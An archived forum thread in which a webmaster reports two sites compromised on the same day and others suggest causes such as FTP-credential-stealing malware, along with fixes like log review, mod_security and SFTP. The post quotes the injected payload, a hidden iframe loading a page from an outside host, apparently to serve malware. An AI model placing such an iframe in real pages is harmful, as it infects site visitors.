homepage Welcome to WebmasterWorld Guest from 54.145.172.149
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Pubcon Platinum Sponsor 2014
Home / Forums Index / Hardware and OS Related Technologies / Website Technology Issues
Forum Library, Charter, Moderators: phranque

Website Technology Issues Forum

    
Two of my websites hacked on the same day
dunhill

5+ Year Member



 
Msg#: 3950565 posted 7:45 am on Jul 11, 2009 (gmt 0)

2 of my websites were hacked on the same day, one is hosted by a very large hosting company and the other is my own server.

If it was just my server that got hacked I would have thought that I havent made my server secure enough.

On my own server I have root access, on the other server its just ftp access, passwords are different, one is Plesk the other is CPanel.

Most of the index.php and other php scripts were modified to include the following

<iframe src="http://example.ru:8080/index.php" width=189 height=120 style="visibility: hidden"></iframe>

I was first made aware when I got an email from Google advising me of the problem - "We recently discovered that some of your pages can cause users to be infected with malicious software."

The question is how did they hack me, when can I do to prevent it?

Thank you for your help

[edited by: encyclo at 11:40 am (utc) on July 11, 2009]
[edit reason] obfuscated link to hacker website [/edit]

 

janharders

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3950565 posted 8:09 am on Jul 11, 2009 (gmt 0)

Look through the error logs of your apache.
With the shared hosting it might have been a local attack, but on your own server (I guess you did have strong passwords?) that can be doubted. I was once asked to clean an infected site and I searched for the entry point and found the error log extremly helpful identifying the joomla module that was exploited. They need a way to load code from a remote machine and they'll usually try multiple times before it succeeds - and these tries can get logged.

Do you use some public cms on both sides? That's what you should look at first.
What you can do to prevent it: stay up to date with your non-inhouse scripts. Once an exploit is in the open, they'll use google to find exploitable sites and just run their bots to try it. Stay ahead. You might also want to look at mod_security, at least for your dedicated server.

dunhill

5+ Year Member



 
Msg#: 3950565 posted 8:39 am on Jul 11, 2009 (gmt 0)

I don't use any CMS, there is no common software between the 2 sites.

I also have mod_security already running on my server

The passwords are secure, not based on names, it has both alpha and numeric characters

I will have a look at the apache logs.

encyclo

WebmasterWorld Senior Member encyclo us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3950565 posted 11:31 am on Jul 11, 2009 (gmt 0)

There are a few Windows virus variants around (such as "gumblar") which infect your local machine and steal FTP passwords from programs such as Filezilla. You should probably start by scanning your local machine for those viruses. Then you will need to change all your passwords.

Note that FTP is inherently insecure because the password is transmitted in plain-text - using ssh (secure FTP) is a much better option, most FTP clients support secure FTP out of the box, and your servers almost certainly will too.

janharders

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3950565 posted 1:10 pm on Jul 11, 2009 (gmt 0)

using ssh (secure FTP) is a much better option

just to add: ftp over ssl (ftps) is also much more secure than regular ftp and I've found it to be performing better than sftp in my setup.

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Hardware and OS Related Technologies / Website Technology Issues
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved